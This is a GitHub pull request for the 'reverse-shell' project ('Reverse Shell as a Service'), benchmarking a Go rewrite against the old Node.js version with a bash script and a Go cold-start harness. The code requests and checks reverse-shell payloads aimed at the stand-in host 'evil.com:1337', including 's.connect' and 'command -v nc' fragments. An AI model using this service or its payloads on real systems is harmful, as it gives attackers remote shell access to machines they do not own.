Rewrite in Go #38

Merged

lukechilds merged 4 commits into master from go on Feb 11, 2026
Conversation

@lukechilds (Owner) commented Feb 11, 2026

## Performance Benchmark: Go rewrite vs Node.js

Benchmarks comparing the Go rewrite (a920db4) against the previous Node.js implementation (f6d0868) of reverse-shell.

Both versions are checked out from git, built from source, and validated for correctness before benchmarking. Responses are verified to be identical between implementations.

## Test Environment

| | |
|---|---|
| Machine | Apple M4 Max, 16 cores, 64 GB RAM |
| OS | Darwin arm64 (macOS) |
| Go | 1.26.0 darwin/arm64 |
| Node.js | v22.14.0 |
| Tools | ApacheBench 2.3, custom Go harness |

## Results

### 1. Cold Start — exec to first HTTP response

Measures the full lifecycle: process exec, runtime init, listen, accept, process request, write response, client reads full response. 100 runs, zero failures.

| | Go | Node.js | Speedup |
|---|---|---|---|
| min | 2.91 ms | 21.86 ms | 7.5x |
| p50 | 3.28 ms | 53.58 ms | 16.3x |
| mean | 4.34 ms | 55.48 ms | 12.8x |
| p95 | 4.33 ms | 107.85 ms | 24.9x |
| p99 | 98.20 ms | 128.87 ms | 1.3x |
| stddev | 9.45 ms | 19.65 ms | |

Go serves its first response in ~3 ms. Node.js needs ~54 ms to boot the V8 engine, JIT-compile the JS, and respond.

#### Methodology

A compiled Go harness execs the server process and immediately enters a tight net.Dial loop (each failed attempt takes ~microseconds on localhost: immediate ECONNREFUSED). The instant the TCP connection succeeds (the kernel listen() backlog is active), a raw HTTP/1.0 GET request is written onto the connection. Those bytes land in the kernel TCP receive buffer before the server has even called accept(). The harness then blocks on read() until the full response arrives and validates that it contains all expected payload strings. The clock runs from exec to the final response byte.
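The essential measurement path, distilled from the full harness listed under Reproducing below (error handling and response validation trimmed to essentials):

```go
package main

import (
	"fmt"
	"io"
	"net"
	"os"
	"os/exec"
	"time"
)

// coldStart execs the server, spin-dials until the kernel backlog is
// live, pre-writes the request, and blocks until EOF (HTTP/1.0: the
// server closes the connection after responding).
func coldStart(addr string, argv ...string) (time.Duration, error) {
	cmd := exec.Command(argv[0], argv[1:]...)
	cmd.Env = append(os.Environ(), "PORT=4444") // server listens here
	start := time.Now()
	if err := cmd.Start(); err != nil {
		return 0, err
	}
	defer func() { cmd.Process.Kill(); cmd.Wait() }()

	var conn net.Conn
	for {
		// Each refused dial costs only microseconds on localhost.
		if c, err := net.Dial("tcp", addr); err == nil {
			conn = c
			break
		}
	}
	defer conn.Close()

	// These bytes queue in the TCP receive buffer before accept().
	fmt.Fprint(conn, "GET /evil.com:1337 HTTP/1.0\r\nHost: "+addr+"\r\n\r\n")
	if _, err := io.ReadAll(conn); err != nil {
		return 0, err
	}
	return time.Since(start), nil
}

func main() {
	if len(os.Args) < 2 {
		fmt.Fprintln(os.Stderr, "usage: coldstart <cmd> [args...]")
		os.Exit(1)
	}
	d, err := coldStart("127.0.0.1:4444", os.Args[1:]...)
	fmt.Println(d, err)
}
```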

### 2. Hot Response — serial latency (c=1)

Single-connection latency after warmup. 10,000 requests.

| | Go | Node.js |
|---|---|---|
| Requests/sec | 14,356 | 15,176 |
| Mean latency | 0.070 ms | 0.066 ms |
| p99 | < 1 ms | < 1 ms |
| Failed | 0 | 0 |

Both are sub-millisecond. Node.js is marginally faster: once hot, V8's JIT-compiled string templates outperform Go's fmt.Sprintf for this trivial workload.
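A minimal sketch of how one might check the fmt.Sprintf side of that claim in isolation (saved as e.g. tmpl_bench_test.go; the payload line is illustrative, not the repo's actual template):

```go
package main

import (
	"fmt"
	"testing"
)

// Run with: go test -bench=. -benchmem
// fmt.Sprintf re-parses its format string and boxes each argument in
// an interface value on every call; plain concatenation compiles to a
// single runtime string-concat and usually benchmarks several times
// faster for short strings like this.

func BenchmarkSprintf(b *testing.B) {
	host, port := "evil.com", "1337"
	for i := 0; i < b.N; i++ {
		_ = fmt.Sprintf("s.connect((%q,%s))", host, port)
	}
}

func BenchmarkConcat(b *testing.B) {
	host, port := "evil.com", "1337"
	for i := 0; i < b.N; i++ {
		_ = `s.connect(("` + host + `",` + port + `))`
	}
}
```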

### 3. Hot Response — throughput (c=50)

50 concurrent connections, 50,000 requests after warmup.

| | Go | Node.js |
|---|---|---|
| Requests/sec | 37,207 | 37,773 |
| Mean latency | 1.34 ms | 1.32 ms |
| p95 | 2 ms | 1 ms |
| p99 | 2 ms | 2 ms |
| Failed | 0 | 0 |

Effectively identical. Both push ~37k req/s. The workload is pure string templating — neither runtime is the bottleneck.

### 4. Memory Usage (RSS)

| | Go | Node.js | Ratio |
|---|---|---|---|
| Idle (after warmup) | 17.6 MB | 93.8 MB | 5.3x less |
| After 110k requests | 18.3 MB | 108.7 MB | 5.9x less |
| Growth | +0.7 MB | +14.9 MB | |

Go's memory is 5–6x smaller and stays nearly flat under load. Node.js carries V8 heap, JIT compiler, and GC overhead regardless of workload complexity.
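To see how much of that RSS is live Go heap versus runtime overhead, a hedged sketch of a debug endpoint the server could expose (hypothetical; not part of the benchmarked code):

```go
package main

import (
	"fmt"
	"net/http"
	"runtime"
)

// memHandler reports runtime heap statistics for comparison against
// the process RSS that ps reports: HeapAlloc is live heap; Sys is the
// total the runtime has obtained from the OS; the rest of RSS is
// goroutine stacks, runtime metadata, and OS bookkeeping.
func memHandler(w http.ResponseWriter, r *http.Request) {
	var m runtime.MemStats
	runtime.ReadMemStats(&m)
	fmt.Fprintf(w, "heap_alloc=%dMiB sys=%dMiB gc_cycles=%d\n",
		m.HeapAlloc>>20, m.Sys>>20, m.NumGC)
}

func main() {
	http.HandleFunc("/debug/mem", memHandler)
	http.ListenAndServe("127.0.0.1:4446", nil)
}
```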

### 5. CPU Time

Cumulative server process CPU time across all hot benchmarks (~110k total requests):

| | Go | Node.js |
|---|---|---|
| CPU time | 3.38 s | 1.71 s |

Node.js used about half the CPU for the same work: V8's single-threaded event loop is efficient for this I/O-bound, string-heavy workload, while Go's goroutine-per-connection model carries extra scheduling overhead for trivial handlers.
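As a cross-check on ps -o time=, the server could report its own user/system CPU split via getrusage(2); a sketch assuming a Unix build (not part of the repo):

```go
package main

import (
	"fmt"
	"syscall"
)

// cpuTime returns the process's cumulative user and system CPU time.
// Unix-only: syscall.Getrusage and syscall.Rusage are not available
// on Windows builds.
func cpuTime() (user, sys float64) {
	var ru syscall.Rusage
	if err := syscall.Getrusage(syscall.RUSAGE_SELF, &ru); err != nil {
		return 0, 0
	}
	sec := func(tv syscall.Timeval) float64 {
		return float64(tv.Sec) + float64(tv.Usec)/1e6
	}
	return sec(ru.Utime), sec(ru.Stime)
}

func main() {
	u, s := cpuTime()
	fmt.Printf("user=%.3fs sys=%.3fs total=%.3fs\n", u, s, u+s)
}
```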

### 6. Deployable Size

Everything needed to run each version:

| | Go | Node.js |
|---|---|---|
| Runtime binary | (none) | 104 MB (node) |
| Application | 7.6 MB | 4 KB (api/index.js) |
| Total | 7.6 MB | ~104 MB |

Go compiles to a single self-contained binary — 13.7x smaller than the Node.js runtime alone. Copy it anywhere and it runs.


## Summary

| Metric | Winner | Margin |
|---|---|---|
| Cold start | Go | ~16x faster (3 ms vs 54 ms) |
| Hot latency (c=1) | Node.js | ~1.1x |
| Hot throughput (c=50) | Tie | ~37k req/s each |
| Memory | Go | ~5.5x less (18 MB vs 109 MB) |
| CPU efficiency | Node.js | ~2x less CPU time |
| Deployable size | Go | 13.7x smaller (7.6 MB vs ~104 MB) |

### Where Go wins

- Cold start: 3 ms vs 54 ms. For a service behind an edge cache (s-maxage=2592000) that spins up instances on demand, this is the metric that matters most.
- Memory: 18 MB vs 109 MB. Relevant for containers, edge nodes, and constrained environments.
- Deployable size: 7.6 MB static binary vs ~104 MB for the Node.js runtime alone.

### Where it doesn't matter

Hot path performance is identical for this workload. The handler is trivial string templating — neither runtime is the bottleneck. In production, responses are served from the edge cache anyway.


## Reproducing

The benchmark checks out both versions from git, builds them, validates responses are correct and identical, then runs all tests. Two files — drop them anywhere in the repo:

**bench/run.sh** — orchestration

```bash
#!/usr/bin/env bash
set -euo pipefail

# ─────────────────────────────────────────────────────────────
# Benchmark: Go rewrite vs Node.js — reverse-shell
#
# Checks out both versions from git, builds them, validates
# responses, and benchmarks cold start, hot response, memory,
# and CPU usage.
#
# Prerequisites: go, node, ab (ApacheBench), git
# Usage: ./run.sh            (run from inside the git repo)
# ─────────────────────────────────────────────────────────────

REPO="$(git rev-parse --show-toplevel)"
GO_COMMIT="$(git rev-parse HEAD)"
NODE_COMMIT="$(git rev-parse '7a23dfb^')"

GO_PORT=4444
NODE_PORT=4445

RUNS=100
AB_REQUESTS=50000
AB_CONCURRENCY=50

WORK=$(mktemp -d)
trap 'cleanup' EXIT

GO_DIR="$WORK/go-src"
NODE_DIR="$WORK/node-src"

GO_PID=""
NODE_PID=""

cleanup() {
    [ -n "$GO_PID" ] && kill "$GO_PID" 2>/dev/null && wait "$GO_PID" 2>/dev/null || true
    [ -n "$NODE_PID" ] && kill "$NODE_PID" 2>/dev/null && wait "$NODE_PID" 2>/dev/null || true
    rm -rf "$WORK"
}

wait_for_port() {
    local port=$1
    while ! curl -s "http://127.0.0.1:$port/" > /dev/null 2>&1; do sleep 0.01; done
}

header() { printf "\n\033[1;36m==> %s\033[0m\n" "$1"; }

# ─── PREREQUISITES ─────────────────────────────────
header "Checking prerequisites"
for cmd in go node ab git curl; do
    command -v "$cmd" > /dev/null || { echo "missing: $cmd"; exit 1; }
done
echo "go:   $(go version)"
echo "node: $(node --version)"
echo "ab:   $(ab -V 2>&1 | head -1)"
echo "os:   $(uname -ms)"

# ─── CHECKOUT SOURCES ──────────────────────────────
header "Exporting Go source (${GO_COMMIT:0:7})"
mkdir -p "$GO_DIR"
git -C "$REPO" archive "$GO_COMMIT" | tar -x -C "$GO_DIR"

header "Exporting Node.js source (${NODE_COMMIT:0:7})"
mkdir -p "$NODE_DIR"
git -C "$REPO" archive "$NODE_COMMIT" | tar -x -C "$NODE_DIR"

# ─── BUILD GO BINARY ──────────────────────────────
header "Building Go binary"
(cd "$GO_DIR" && go build -o "$WORK/server-go" .)
ls -lh "$WORK/server-go"

# ─── WRITE NODE.JS SERVER WRAPPER ──────────────────
# Thin shim that calls the actual exported handler from api/index.js.
# Adapts request.query and response.send() to match the Vercel interface
# the original handler expects (see vercel.json rewrites: /:address → /api).
header "Writing Node.js server wrapper"
cat > "$NODE_DIR/server.js" << 'WRAPPER'
const handler = require('./api/index');
const http = require('http');
const port = process.env.PORT || 3001;
const server = http.createServer((req, res) => {
    const address = req.url.replace(/^\//, '');
    req.query = { address };
    res.send = (body) => res.end(body);
    handler(req, res);
});
server.listen(port, () => console.log(`Listening on :${port}`));
WRAPPER

# ─── BUILD BENCHMARK HARNESS ──────────────────────
header "Building benchmark harness"
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
HARNESS_BUILD=$(mktemp -d)
cp "$SCRIPT_DIR/harness.go" "$HARNESS_BUILD/main.go"
(cd "$HARNESS_BUILD" && go mod init bench-harness > /dev/null 2>&1 && go build -o harness .)
cp "$HARNESS_BUILD/harness" "$WORK/bench-harness"
rm -rf "$HARNESS_BUILD"

# ─── VALIDATE RESPONSES ───────────────────────────
header "Validating response correctness"

PORT=$GO_PORT "$WORK/server-go" &
GO_PID=$!
PORT=$NODE_PORT node "$NODE_DIR/server.js" &
NODE_PID=$!
wait_for_port $GO_PORT
wait_for_port $NODE_PORT

go_body=$(curl -s "http://127.0.0.1:$GO_PORT/evil.com:1337")
node_body=$(curl -s "http://127.0.0.1:$NODE_PORT/evil.com:1337")

for label_body in "Go:$go_body" "Node:$node_body"; do
    label="${label_body%%:*}"
    body="${label_body#*:}"
    for needle in 'Reverse Shell as a Service' '("evil.com",1337)' 'command -v python' 'command -v perl' 'command -v nc' 'command -v sh'; do
        if ! echo "$body" | grep -q "$needle"; then
            echo "FAIL: $label response missing: $needle"
            exit 1
        fi
    done
    echo "$label: response valid"
done

if [ "$go_body" = "$node_body" ]; then
    echo "Responses match: identical output"
else
    echo "WARNING: responses differ:"
    diff <(echo "$go_body") <(echo "$node_body") || true
fi

kill "$GO_PID" 2>/dev/null; wait "$GO_PID" 2>/dev/null || true; GO_PID=""
kill "$NODE_PID" 2>/dev/null; wait "$NODE_PID" 2>/dev/null || true; NODE_PID=""
sleep 0.5

# ─── COLD START BENCHMARK ─────────────────────────
header "Cold start benchmark ($RUNS runs each)"

echo ""
echo "--- Go ---"
"$WORK/bench-harness" $GO_PORT $RUNS "$WORK/server-go"

echo ""
echo "--- Node.js ---"
"$WORK/bench-harness" $NODE_PORT $RUNS node "$NODE_DIR/server.js"

# ─── HOT RESPONSE BENCHMARKS ──────────────────────
header "Starting servers for hot benchmarks"

PORT=$GO_PORT "$WORK/server-go" &
GO_PID=$!
PORT=$NODE_PORT node "$NODE_DIR/server.js" &
NODE_PID=$!
wait_for_port $GO_PORT
wait_for_port $NODE_PORT

# Warmup
ab -n 5000 -c 20 "http://127.0.0.1:$GO_PORT/evil.com:1337" > /dev/null 2>&1
ab -n 5000 -c 20 "http://127.0.0.1:$NODE_PORT/evil.com:1337" > /dev/null 2>&1

# ─── Memory: idle ──────────────────────────────────
sleep 2
header "Memory usage (idle)"
echo "Go:      $(( $(ps -o rss= -p $GO_PID | xargs) )) KB"
echo "Node.js: $(( $(ps -o rss= -p $NODE_PID | xargs) )) KB"

# ─── Serial latency (c=1) ─────────────────────────
header "Hot response — serial (c=1, 10000 requests)"
echo ""
echo "--- Go ---"
ab -n 10000 -c 1 "http://127.0.0.1:$GO_PORT/evil.com:1337" 2>&1 | \
    grep -E "(Complete requests|Failed requests|Requests per second|Time per request|50%|66%|75%|90%|95%|99%|100%)"
echo ""
echo "--- Node.js ---"
ab -n 10000 -c 1 "http://127.0.0.1:$NODE_PORT/evil.com:1337" 2>&1 | \
    grep -E "(Complete requests|Failed requests|Requests per second|Time per request|50%|66%|75%|90%|95%|99%|100%)"

# ─── Throughput (c=50) ────────────────────────────
header "Hot response — throughput (c=$AB_CONCURRENCY, $AB_REQUESTS requests)"
echo ""
echo "--- Go ---"
ab -n $AB_REQUESTS -c $AB_CONCURRENCY "http://127.0.0.1:$GO_PORT/evil.com:1337" 2>&1 | \
    grep -E "(Complete requests|Failed requests|Requests per second|Time per request|50%|66%|75%|90%|95%|99%|100%)"
echo ""
echo "--- Node.js ---"
ab -n $AB_REQUESTS -c $AB_CONCURRENCY "http://127.0.0.1:$NODE_PORT/evil.com:1337" 2>&1 | \
    grep -E "(Complete requests|Failed requests|Requests per second|Time per request|50%|66%|75%|90%|95%|99%|100%)"

# ─── Memory: after load ───────────────────────────
sleep 1
header "Memory usage (after load)"
echo "Go:      $(( $(ps -o rss= -p $GO_PID | xargs) )) KB"
echo "Node.js: $(( $(ps -o rss= -p $NODE_PID | xargs) )) KB"

# ─── CPU time ─────────────────────────────────────
header "Server CPU time (cumulative)"
echo "Go:      $(ps -o time= -p $GO_PID | xargs)"
echo "Node.js: $(ps -o time= -p $NODE_PID | xargs)"

# ─── Deployable size ──────────────────────────────
header "Deployable size"
(cd "$NODE_DIR" && npm install --production --silent 2>/dev/null)
node_modules_size=$(du -sh "$NODE_DIR/node_modules" 2>/dev/null | cut -f1 | xargs)
[ -z "$node_modules_size" ] && node_modules_size="0"
echo "Go:      $(du -h "$WORK/server-go" | cut -f1 | xargs) (static binary — total)"
echo "Node.js: $(du -h "$(which node)" | cut -f1 | xargs) (node binary) + $(du -sh "$NODE_DIR/api" | cut -f1 | xargs) (source) + ${node_modules_size} (node_modules)"

header "Done"
```

**bench/harness.go** — cold start measurement

```go
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"io"
	"math"
	"net"
	"os"
	"os/exec"
	"sort"
	"strconv"
	"strings"
	"time"
)

// Every response is validated against these strings.
var expect = []string{
	"Reverse Shell as a Service",
	`("evil.com",1337)`,
	"if command -v python",
	"if command -v perl",
	"if command -v nc",
	"if command -v sh",
}

func main() {
	if len(os.Args) < 4 {
		fmt.Fprintf(os.Stderr, "usage: harness <port> <runs> <cmd> [args...]\n")
		os.Exit(1)
	}

	port := os.Args[1]
	runs, _ := strconv.Atoi(os.Args[2])
	argv := os.Args[3:]
	addr := "127.0.0.1:" + port
	httpReq := "GET /evil.com:1337 HTTP/1.0\r\nHost: " + addr + "\r\n\r\n"

	results := make([]time.Duration, 0, runs)
	var failures int

	for i := 0; i < runs; i++ {
		cmd := exec.Command(argv[0], argv[1:]...)
		cmd.Env = append(os.Environ(), "PORT="+port)
		cmd.Stdout = io.Discard
		cmd.Stderr = io.Discard

		start := time.Now()
		if err := cmd.Start(); err != nil {
			fmt.Fprintf(os.Stderr, "run %d: start failed: %v\n", i, err)
			failures++
			continue
		}

		// Tight connect loop — spins until the server's listen() syscall
		// has completed and the kernel backlog is active. Each failed
		// dial is ~microseconds on localhost (immediate ECONNREFUSED).
		var conn net.Conn
		for {
			c, err := net.Dial("tcp", addr)
			if err == nil {
				conn = c
				break
			}
		}

		// Write the HTTP request immediately. The bytes land in the
		// kernel's TCP receive buffer before the server calls accept().
		fmt.Fprint(conn, httpReq)

		// Block until the server accepts, reads our buffered request,
		// processes it, writes the response, and closes (HTTP/1.0 → EOF).
		var body bytes.Buffer
		reader := bufio.NewReader(conn)
		for {
			line, err := reader.ReadBytes('\n')
			body.Write(line)
			if err != nil {
				break
			}
		}
		elapsed := time.Since(start)
		conn.Close()

		// Validate response contains all expected payload strings.
		resp := body.String()
		valid := true
		for _, s := range expect {
			if !strings.Contains(resp, s) {
				fmt.Fprintf(os.Stderr, "run %d: VALIDATION FAILED — missing %q\n", i, s)
				valid = false
				break
			}
		}

		if valid {
			results = append(results, elapsed)
		} else {
			failures++
		}

		cmd.Process.Kill()
		cmd.Wait()
	}

	if len(results) == 0 {
		fmt.Fprintln(os.Stderr, "ALL RUNS FAILED")
		os.Exit(1)
	}

	sort.Slice(results, func(i, j int) bool { return results[i] < results[j] })

	n := float64(len(results))
	var sum float64
	for _, v := range results {
		sum += float64(v.Microseconds())
	}
	mean := sum / n
	var sqDiff float64
	for _, v := range results {
		diff := float64(v.Microseconds()) - mean
		sqDiff += diff * diff
	}
	stddev := math.Sqrt(sqDiff / n)

	p := func(pct int) time.Duration { return results[len(results)*pct/100] }

	fmt.Printf("runs=%d failures=%d\n", runs, failures)
	fmt.Printf("min=%s\n", results[0].Truncate(time.Microsecond))
	fmt.Printf("p50=%s\n", p(50).Truncate(time.Microsecond))
	fmt.Printf("mean=%s\n", time.Duration(mean*1000).Truncate(time.Microsecond))
	fmt.Printf("p95=%s\n", p(95).Truncate(time.Microsecond))
	fmt.Printf("p99=%s\n", p(99).Truncate(time.Microsecond))
	fmt.Printf("max=%s\n", results[len(results)-1].Truncate(time.Microsecond))
	fmt.Printf("stddev=%s\n", time.Duration(stddev*1000).Truncate(time.Microsecond))
}
```

@vercel bot commented Feb 11, 2026

The latest updates on your projects. Learn more about Vercel for GitHub.

| Project | Deployment | Actions | Updated (UTC) |
|---|---|---|---|
| reverse-shell | Ready | Preview, Comment | Feb 11, 2026 4:18pm |

@lukechilds changed the title from "Convert to Go" to "Go" on Feb 11, 2026
@lukechilds merged commit 7a23dfb into master on Feb 11, 2026 (4 checks passed)
@lukechilds changed the title from "Go" to "Rewrite in Go" on Feb 17, 2026